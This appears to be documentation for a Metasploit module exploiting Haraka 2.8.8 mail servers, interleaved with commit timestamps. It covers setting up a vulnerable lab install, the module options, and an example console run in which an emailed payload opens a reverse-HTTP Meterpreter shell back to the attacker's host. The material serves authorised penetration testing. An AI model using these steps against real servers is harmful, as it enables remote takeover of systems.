2017-01-27 10:31:12 +01:00
## Vulnerable Application
2017-05-10 22:52:13 -05:00
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
2017-01-29 18:02:12 +01:00
```
2017-05-10 22:09:26 -05:00
#install nodejs and npm
2017-05-10 22:52:13 -05:00
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt install nodejs
2017-05-10 22:09:26 -05:00
#Haraka setup
2017-01-27 10:31:12 +01:00
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
2017-05-10 22:52:13 -05:00
npm install npm
npm install
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
haraka -i haraka
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
cat << EOF > haraka/config/plugins
2017-01-27 10:31:12 +01:00
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
2017-05-10 22:09:26 -05:00
echo haraka.test >> haraka/config/host_list
2017-01-27 10:31:12 +01:00
# Launch haraka as root
2017-05-10 22:52:13 -05:00
sudo haraka -c haraka
2017-01-29 18:02:12 +01:00
` ``
2017-01-27 10:31:12 +01:00
2017-05-10 22:52:13 -05:00
## Options
2017-01-27 10:31:12 +01:00
2017-05-10 22:52:13 -05:00
**from_email**
2017-01-27 10:31:12 +01:00
2017-05-10 22:52:13 -05:00
String used in the SMTP MAILFROM command
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
**to_email**
2017-01-27 10:31:12 +01:00
String used in the SMTP MAILTO command
2017-05-10 22:09:26 -05:00
**lhost**
The address to serve the payload from
**rhost**
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
The address or hostname to target
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
**payload**
2017-01-27 10:31:12 +01:00
2017-05-10 22:09:26 -05:00
Any compatible Metasploit payload
2017-01-27 10:31:12 +01:00
2017-05-10 22:52:13 -05:00
## Example Run
2017-01-27 10:31:12 +01:00
` ``
2017-07-06 22:43:46 -05:00
msf > use exploit/linux/smtp/haraka
2017-05-10 22:52:13 -05:00
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run
[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
msf exploit(haraka) >
2017-01-27 10:31:12 +01:00
` ``
